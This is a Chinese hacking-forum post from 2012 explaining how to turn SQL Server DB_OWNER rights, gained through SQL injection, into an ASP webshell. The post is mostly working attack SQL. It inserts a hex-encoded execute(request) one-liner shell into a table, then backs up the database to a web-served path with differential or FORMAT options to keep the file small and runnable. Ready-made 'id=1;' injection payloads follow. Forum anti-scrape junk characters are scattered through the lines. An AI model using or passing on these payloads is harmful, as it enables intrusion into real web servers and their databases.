找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2305|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:
" z. Z; c# {, b- t: T! Y% S& t+ X; [! @. w4 K
减少备份文件大小,得到可执行的webshell成功率提高不少2 B7 m# X5 K. H2 Z1 {
一利用差异备份0 C$ \, v: M- a. I# Q
加一个参数WITH DIFFERENTIAL7 ^) U$ A1 |$ j" _0 \

- R2 A. n  w1 f( }1% H5 v/ J4 z" J& B
2
. D9 U( w: R( f3 N6 n3% Z  g0 D: E8 H. z' x$ W
4
0 T6 M$ f% ?7 G( {" d declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s# e, V( O8 ^! \2 d# @: `
create table [dbo].[xiaolu] ([cmd] [image]);% W- V7 s, ]" C8 Q1 R' R6 h) t
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( L* |' B* s; \5 Bdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
  ?. R/ F! y* f3 z
/ N& X7 A9 b, ~9 M二利用完全FORMAT- `  z# a/ X+ y4 z2 w
加一个参数WITH FROMAT
. A9 Z6 @: q& `2 V. K/ C有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以3 i6 e% j  B6 C9 l7 X$ H6 X* Y6 l

; j/ {/ @7 @* G# s+ F( h- ~2 y! Y13 f6 ?+ }7 w( t- w" ]  |
22 Z, @; W) k+ X% V) d+ g. y
3
+ B4 x. w/ z# G; I2 A46 @* M  Y) f# ~" i: ^" T! h
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s/ R3 F! i& m& I7 R
create table [dbo].[xiaolu] ([cmd] [image]);
! G6 R+ d4 q! h# Tinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( W% U; ~# `, ]5 T1 U- odeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT ) w% x! Z- u, ]

. _7 B2 c( a1 t+ V8 F* ^& |2 H# D总的来说就是那么简单几句,下面以备份数据库model为例子
9 Q$ s& M9 x/ u2 o8 Z* W2 Z1& g  w9 _( t  J$ H( q* D8 z  M
' l! e- S, H1 P) B0 `# D3 I
17 R$ a$ \: ^7 c6 G4 N
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') ( J5 W& Y$ F5 F: D8 h' g
$ T. x" \6 `& ^/ l/ \
2+ [7 r, l1 Z* ^+ e: A6 _* V) ]; [
( W0 @& I0 ~4 }4 s5 D: s
1
. q# a7 \) H9 y# x) y id=1;backup database model to disk='你的路径‘ with differential,format;-- 5 }) \  Q  S+ |4 @8 \) V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表